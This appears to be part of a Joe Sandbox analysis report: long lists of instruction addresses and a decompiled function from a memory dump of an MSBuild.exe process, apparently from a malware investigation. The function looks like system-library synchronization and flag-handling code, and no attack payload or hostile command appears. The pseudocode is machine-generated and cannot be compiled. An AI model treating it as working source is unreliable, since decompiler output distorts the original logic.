                                                                                                0x010c4141
                                                                                                0x010c4145
                                                                                                0x010c4147
                                                                                                0x010c414e
                                                                                                0x010c4151
                                                                                                0x010c4159
                                                                                                0x010c415c
                                                                                                0x010c4160
                                                                                                0x010c4164
                                                                                                0x010c4168
                                                                                                0x010c416c
                                                                                                0x010c417f
                                                                                                0x010c4181
                                                                                                0x010c446a
                                                                                                0x010c446a
                                                                                                0x010c418c
                                                                                                0x010c4195
                                                                                                0x010c4199
                                                                                                0x010c4432
                                                                                                0x010c4439
                                                                                                0x010c443d
                                                                                                0x010c4442
                                                                                                0x010c4447
                                                                                                0x00000000
                                                                                                0x010c419f
                                                                                                0x010c41a3
                                                                                                0x010c41b1
                                                                                                0x010c41b9
                                                                                                0x010c41bd
                                                                                                0x010c45db
                                                                                                0x010c45db
                                                                                                0x00000000
                                                                                                0x010c41c3
                                                                                                0x010c41c3
                                                                                                0x010c41ce
                                                                                                0x010c41d4
                                                                                                0x0110e138
                                                                                                0x0110e13e
                                                                                                0x0110e169
                                                                                                0x0110e16d
                                                                                                0x0110e19e
                                                                                                0x0110e16f
                                                                                                0x0110e16f
                                                                                                0x0110e175
                                                                                                0x0110e179
                                                                                                0x0110e18f
                                                                                                0x0110e193
                                                                                                0x00000000
                                                                                                0x0110e199
                                                                                                0x00000000
                                                                                                0x0110e199
                                                                                                0x0110e193
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010c41da
                                                                                                0x010c41da
                                                                                                0x010c41df
                                                                                                0x010c41e4
                                                                                                0x010c41ec
                                                                                                0x010c4203
                                                                                                0x010c4207
                                                                                                0x0110e1fd
                                                                                                0x010c4222
                                                                                                0x010c4226
                                                                                                0x0110e1f3
                                                                                                0x0110e1f3
                                                                                                0x010c422c
                                                                                                0x010c422c
                                                                                                0x010c4233
                                                                                                0x0110e1ed
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010c4239
                                                                                                0x010c4239
                                                                                                0x010c4239
                                                                                                0x010c4239
                                                                                                0x010c4233
                                                                                                0x010c4226
                                                                                                0x010c41ee
                                                                                                0x010c41ee
                                                                                                0x010c41f4
                                                                                                0x010c4575
                                                                                                0x0110e1b1
                                                                                                0x0110e1b1
                                                                                                0x00000000
                                                                                                0x010c457b
                                                                                                0x010c457b
                                                                                                0x010c4582
                                                                                                0x0110e1ab
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010c4588
                                                                                                0x010c4588
                                                                                                0x010c458c
                                                                                                0x0110e1c4
                                                                                                0x0110e1c4
                                                                                                0x00000000
                                                                                                0x010c4592
                                                                                                0x010c4592
                                                                                                0x010c4599
                                                                                                0x0110e1be
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010c459f
                                                                                                0x010c459f
                                                                                                0x010c45a3
                                                                                                0x0110e1d7
                                                                                                0x0110e1e4
                                                                                                0x00000000
                                                                                                0x010c45a9
                                                                                                0x010c45a9
                                                                                                0x010c45b0
                                                                                                0x0110e1d1
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010c45b6
                                                                                                0x010c45b6
                                                                                                0x010c45b6
                                                                                                0x00000000
                                                                                                0x010c45b6
                                                                                                0x010c45b0
                                                                                                0x010c45a3
                                                                                                0x010c4599
                                                                                                0x010c458c
                                                                                                0x010c4582
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010c41f4
                                                                                                0x010c423e
                                                                                                0x010c4241
                                                                                                0x010c45c0
                                                                                                0x010c45c4
                                                                                                0x00000000
                                                                                                0x010c45ca
                                                                                                0x010c45ca
                                                                                                0x00000000
                                                                                                0x0110e207
                                                                                                0x0110e20f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010c45d1
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010c45ca
                                                                                                0x00000000
                                                                                                0x010c4247
                                                                                                0x010c4247
                                                                                                0x010c4247
                                                                                                0x010c4249
                                                                                                0x010c4249
                                                                                                0x010c4249
                                                                                                0x010c4251
                                                                                                0x010c4251
                                                                                                0x010c4257
                                                                                                0x010c425f
                                                                                                0x010c426e
                                                                                                0x010c4270
                                                                                                0x010c427a
                                                                                                0x0110e219
                                                                                                0x0110e219
                                                                                                0x010c4280
                                                                                                0x010c4282
                                                                                                0x010c4456
                                                                                                0x010c45ea
                                                                                                0x00000000
                                                                                                0x010c45f0
                                                                                                0x0110e223
                                                                                                0x00000000
                                                                                                0x0110e223
                                                                                                0x010c445c
                                                                                                0x010c445c
                                                                                                0x00000000
                                                                                                0x010c445c
                                                                                                0x00000000
                                                                                                0x010c4288
                                                                                                0x010c428c
                                                                                                0x0110e298
                                                                                                0x010c4292
                                                                                                0x010c4292
                                                                                                0x010c429e
                                                                                                0x010c42a3
                                                                                                0x010c42a7
                                                                                                0x010c42ac
                                                                                                0x0110e22d
                                                                                                0x010c42b2
                                                                                                0x010c42b2
                                                                                                0x010c42b9
                                                                                                0x010c42bc
                                                                                                0x010c42c2
                                                                                                0x010c42ca
                                                                                                0x010c42cd
                                                                                                0x010c42cd
                                                                                                0x010c42d4
                                                                                                0x010c433f
                                                                                                0x010c433f
                                                                                                0x010c42d6
                                                                                                0x010c42d6
                                                                                                0x010c42d9
                                                                                                0x010c42dd
                                                                                                0x010c42eb
                                                                                                0x0110e23a
                                                                                                0x010c42f1
                                                                                                0x010c4305
                                                                                                0x010c430d
                                                                                                0x010c4315
                                                                                                0x010c4318
                                                                                                0x010c431f
                                                                                                0x010c4322
                                                                                                0x010c432e
                                                                                                0x010c433b
                                                                                                0x010c433b
                                                                                                0x00000000
                                                                                                0x010c432e
                                                                                                0x010c42eb
                                                                                                0x010c434c
                                                                                                0x010c434e
                                                                                                0x010c4352
                                                                                                0x010c4359
                                                                                                0x010c435e
                                                                                                0x010c4361
                                                                                                0x010c436e
                                                                                                0x010c438a
                                                                                                0x010c438e
                                                                                                0x010c4396
                                                                                                0x010c439e
                                                                                                0x010c43a1
                                                                                                0x010c43ad
                                                                                                0x010c43bb
                                                                                                0x010c43bb
                                                                                                0x010c43ad
                                                                                                0x010c436e
                                                                                                0x010c43bf
                                                                                                0x010c43c5
                                                                                                0x010c4463
                                                                                                0x010c4463
                                                                                                0x010c43ce
                                                                                                0x010c43d5
                                                                                                0x010c43d9
                                                                                                0x010c43df
                                                                                                0x010c4475
                                                                                                0x010c4479
                                                                                                0x010c4491
                                                                                                0x010c4491
                                                                                                0x010c4479
                                                                                                0x010c43e5
                                                                                                0x010c43eb
                                                                                                0x010c43f4
                                                                                                0x010c43f6
                                                                                                0x010c43f9
                                                                                                0x010c43fc
                                                                                                0x010c43ff
                                                                                                0x010c44e8
                                                                                                0x010c44ed
                                                                                                0x010c44f3
                                                                                                0x0110e247
                                                                                                0x00000000
                                                                                                0x010c44f9
                                                                                                0x010c4504
                                                                                                0x010c4508
                                                                                                0x010c450f
                                                                                                0x0110e269
                                                                                                0x00000000
                                                                                                0x010c4515
                                                                                                0x010c4519
                                                                                                0x010c4531
                                                                                                0x010c4534
                                                                                                0x010c4537
                                                                                                0x010c453e
                                                                                                0x010c4541
                                                                                                0x010c454a
                                                                                                0x0110e255
                                                                                                0x0110e255
                                                                                                0x0110e25b
                                                                                                0x0110e25e
                                                                                                0x0110e261
                                                                                                0x0110e261
                                                                                                0x010c4555
                                                                                                0x010c4559
                                                                                                0x010c455d
                                                                                                0x0110e26d
                                                                                                0x0110e270
                                                                                                0x0110e274
                                                                                                0x0110e27a
                                                                                                0x0110e27d
                                                                                                0x0110e28e
                                                                                                0x0110e28e
                                                                                                0x010c4563
                                                                                                0x010c4563
                                                                                                0x010c4569
                                                                                                0x010c4569
                                                                                                0x00000000
                                                                                                0x010c455d
                                                                                                0x010c450f
                                                                                                0x00000000
                                                                                                0x010c44f3
                                                                                                0x010c43ff
                                                                                                0x010c4405
                                                                                                0x010c4405
                                                                                                0x010c4405
                                                                                                0x010c42ac
                                                                                                0x010c428c
                                                                                                0x010c4282
                                                                                                0x010c4407
                                                                                                0x010c440d
                                                                                                0x0110e2af
                                                                                                0x0110e2af
                                                                                                0x010c4413
                                                                                                0x010c4413
                                                                                                0x00000000
                                                                                                0x010c41d4
                                                                                                0x00000000
                                                                                                0x010c41c3
                                                                                                0x010c41bd
                                                                                                0x010c4415
                                                                                                0x010c4415
                                                                                                0x010c4416
                                                                                                0x010c4417
                                                                                                0x010c4429
                                                                                                0x010c416e
                                                                                                0x010c416e
                                                                                                0x010c4175
                                                                                                0x010c4498
                                                                                                0x010c449f
                                                                                                0x0110e12d
                                                                                                0x00000000
                                                                                                0x0110e133
                                                                                                0x00000000
                                                                                                0x0110e133
                                                                                                0x010c44a5
                                                                                                0x010c44a5
                                                                                                0x010c44aa
                                                                                                0x00000000
                                                                                                0x010c44bb
                                                                                                0x010c44ca
                                                                                                0x010c44d6
                                                                                                0x010c44d7
                                                                                                0x010c44d8
                                                                                                0x010c44e3
                                                                                                0x010c44e3
                                                                                                0x010c44aa
                                                                                                0x010c417b
                                                                                                0x010c417b
                                                                                                0x010c417b
                                                                                                0x00000000
                                                                                                0x010c417b
                                                                                                0x010c4175
                                                                                                0x00000000

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 48e8c6c71e79acc16c53c443c4cc7c38bba92d29f004bab11d86ba29307cbfd4
                                                                                                • Instruction ID: 1bd169b12db0dc1a4c65cdb429fc615c598e5830444a32cffb56bc9bf2ccf546
                                                                                                • Opcode Fuzzy Hash: 48e8c6c71e79acc16c53c443c4cc7c38bba92d29f004bab11d86ba29307cbfd4
                                                                                                • Instruction Fuzzy Hash: D1F16C70A082118FD729CF19C490A7EBBE1BF98A14F54896EF9C6C7291E774D881CB52
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010D20A0 Relevance: .4, Instructions: 420COMMONCrypto
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 92%
                                                                                                			E010D20A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x1198714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E010D2EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E010D2EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E010A58EC(_t240);
									_t221 =  *0x1195cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x1195cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E010E4A2C(0x1196e40, 0x10e4b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E010C7D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x1085c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E010DF6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E010DF6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E01127016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L010C2400(_t267 + 0x20);
															}
															L010C2400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E010D2397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E010C2280(_t134, 0x1198608);
									__eflags =  *0x1196e48 - _t253; // 0x0
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E010BFFB0(_t198, _t241, 0x1198608);
										__eflags = _t253;
										if(_t253 != 0) {
											L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x1196e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x1198608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E010D6B90(_t210,  &_v64);
										_t262 =  *0x1198608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E010DE180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E010E97C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E010E006A(0x1198608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x1198608);
												E010EB180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x1196904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x1196e48; // 0x0
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E010BFFB0(_t198, _t240, 0x1198608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E010E00C2(0x1198608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}











































































                                                                                                0x010d20a0
                                                                                                0x010d20a8
                                                                                                0x010d20ad
                                                                                                0x010d20b3
                                                                                                0x010d20b8
                                                                                                0x010d20c2
                                                                                                0x010d20c7
                                                                                                0x010d20cb
                                                                                                0x010d20d2
                                                                                                0x010d2263
                                                                                                0x010d2266
                                                                                                0x01115836
                                                                                                0x01115836
                                                                                                0x00000000
                                                                                                0x010d226c
                                                                                                0x010d226c
                                                                                                0x010d2270
                                                                                                0x010d2274
                                                                                                0x010d20e2
                                                                                                0x010d20e2
                                                                                                0x010d20e6
                                                                                                0x010d20ee
                                                                                                0x011157dc
                                                                                                0x011157de
                                                                                                0x011157ec
                                                                                                0x011157ec
                                                                                                0x011157f1
                                                                                                0x011157f3
                                                                                                0x011157f8
                                                                                                0x00000000
                                                                                                0x011157f8
                                                                                                0x011157e0
                                                                                                0x011157e4
                                                                                                0x011157ea
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x011157ea
                                                                                                0x010d20f4
                                                                                                0x010d20f4
                                                                                                0x010d20f8
                                                                                                0x010d20f8
                                                                                                0x010d20fc
                                                                                                0x010d2100
                                                                                                0x010d2106
                                                                                                0x010d2201
                                                                                                0x010d2206
                                                                                                0x010d220b
                                                                                                0x010d220e
                                                                                                0x010d22a9
                                                                                                0x010d22ac
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010d22b2
                                                                                                0x010d22b5
                                                                                                0x01115801
                                                                                                0x01115806
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01115810
                                                                                                0x01115815
                                                                                                0x01115818
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0111581e
                                                                                                0x010d22bb
                                                                                                0x010d22bb
                                                                                                0x010d2218
                                                                                                0x010d2218
                                                                                                0x010d221c
                                                                                                0x010d2220
                                                                                                0x010d2222
                                                                                                0x010d22c2
                                                                                                0x010d22c4
                                                                                                0x010d22dc
                                                                                                0x010d22dc
                                                                                                0x010d22e1
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010d22e7
                                                                                                0x010d22c8
                                                                                                0x010d22cd
                                                                                                0x010d22d3
                                                                                                0x010d22d6
                                                                                                0x01115823
                                                                                                0x01115825
                                                                                                0x01115827
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0111582d
                                                                                                0x00000000
                                                                                                0x0111582d
                                                                                                0x00000000
                                                                                                0x010d2228
                                                                                                0x010d2228
                                                                                                0x00000000
                                                                                                0x010d2228
                                                                                                0x010d2222
                                                                                                0x010d2214
                                                                                                0x010d2214
                                                                                                0x00000000
                                                                                                0x010d2114
                                                                                                0x010d2114
                                                                                                0x010d2114
                                                                                                0x010d211a
                                                                                                0x010d211c
                                                                                                0x010d2348
                                                                                                0x010d234d
                                                                                                0x01115840
                                                                                                0x01115845
                                                                                                0x01115848
                                                                                                0x0111584e
                                                                                                0x0111584e
                                                                                                0x01115848
                                                                                                0x010d2353
                                                                                                0x010d2355
                                                                                                0x010d2388
                                                                                                0x010d2388
                                                                                                0x010d2368
                                                                                                0x010d236a
                                                                                                0x010d236c
                                                                                                0x010d238f
                                                                                                0x00000000
                                                                                                0x010d236e
                                                                                                0x010d236e
                                                                                                0x010d218e
                                                                                                0x010d218e
                                                                                                0x010d2191
                                                                                                0x010d2195
                                                                                                0x01115a03
                                                                                                0x01115a06
                                                                                                0x01115a0c
                                                                                                0x01115a0f
                                                                                                0x01115a11
                                                                                                0x01115a13
                                                                                                0x01115a13
                                                                                                0x01115a19
                                                                                                0x01115a1f
                                                                                                0x00000000
                                                                                                0x010d219b
                                                                                                0x010d219b
                                                                                                0x010d21a0
                                                                                                0x010d2282
                                                                                                0x010d2284
                                                                                                0x010d2284
                                                                                                0x010d2284
                                                                                                0x010d2284
                                                                                                0x010d21a6
                                                                                                0x010d21a9
                                                                                                0x010d21ac
                                                                                                0x010d21ae
                                                                                                0x010d21b3
                                                                                                0x010d228b
                                                                                                0x010d2290
                                                                                                0x010d2379
                                                                                                0x010d2296
                                                                                                0x010d2298
                                                                                                0x010d2298
                                                                                                0x010d2290
                                                                                                0x010d21b9
                                                                                                0x010d21be
                                                                                                0x010d22a2
                                                                                                0x010d22a2
                                                                                                0x010d21c4
                                                                                                0x010d21c8
                                                                                                0x010d21cc
                                                                                                0x010d21d0
                                                                                                0x010d21d4
                                                                                                0x010d21de
                                                                                                0x010d21e3
                                                                                                0x01115a29
                                                                                                0x01115a2c
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01115a3b
                                                                                                0x00000000
                                                                                                0x010d21e9
                                                                                                0x010d21e9
                                                                                                0x010d21e9
                                                                                                0x010d21ee
                                                                                                0x010d21f1
                                                                                                0x01115a45
                                                                                                0x01115a4b
                                                                                                0x01115a52
                                                                                                0x01115a58
                                                                                                0x01115a5d
                                                                                                0x01115a5f
                                                                                                0x01115a71
                                                                                                0x01115a61
                                                                                                0x01115a6a
                                                                                                0x01115a6a
                                                                                                0x01115a76
                                                                                                0x01115a79
                                                                                                0x01115a7f
                                                                                                0x01115a83
                                                                                                0x01115a85
                                                                                                0x01115a87
                                                                                                0x01115a87
                                                                                                0x01115a8c
                                                                                                0x01115a91
                                                                                                0x01115a97
                                                                                                0x01115a9f
                                                                                                0x01115aa0
                                                                                                0x01115aa1
                                                                                                0x01115aa6
                                                                                                0x01115aab
                                                                                                0x01115ab1
                                                                                                0x01115ab3
                                                                                                0x01115ab9
                                                                                                0x01115aca
                                                                                                0x01115ad4
                                                                                                0x01115ad4
                                                                                                0x01115ade
                                                                                                0x01115ade
                                                                                                0x01115aab
                                                                                                0x01115a79
                                                                                                0x01115a52
                                                                                                0x010d21f7
                                                                                                0x010d21f9
                                                                                                0x010d21fe
                                                                                                0x010d21fe
                                                                                                0x010d21e3
                                                                                                0x010d2195
                                                                                                0x010d236c
                                                                                                0x010d2122
                                                                                                0x010d2122
                                                                                                0x010d2124
                                                                                                0x010d2231
                                                                                                0x010d2236
                                                                                                0x010d2236
                                                                                                0x010d2238
                                                                                                0x010d2238
                                                                                                0x010d2240
                                                                                                0x010d2242
                                                                                                0x010d2244
                                                                                                0x011159fc
                                                                                                0x010d218c
                                                                                                0x010d218c
                                                                                                0x00000000
                                                                                                0x010d218c
                                                                                                0x010d224a
                                                                                                0x010d224f
                                                                                                0x010d2256
                                                                                                0x010d2304
                                                                                                0x010d2309
                                                                                                0x010d230f
                                                                                                0x010d231e
                                                                                                0x010d231e
                                                                                                0x010d231e
                                                                                                0x010d2320
                                                                                                0x010d2325
                                                                                                0x010d232a
                                                                                                0x010d232c
                                                                                                0x010d233e
                                                                                                0x010d233e
                                                                                                0x00000000
                                                                                                0x010d232c
                                                                                                0x010d2311
                                                                                                0x010d2317
                                                                                                0x010d231a
                                                                                                0x010d231c
                                                                                                0x010d2380
                                                                                                0x010d2380
                                                                                                0x010d2380
                                                                                                0x010d2384
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010d2386
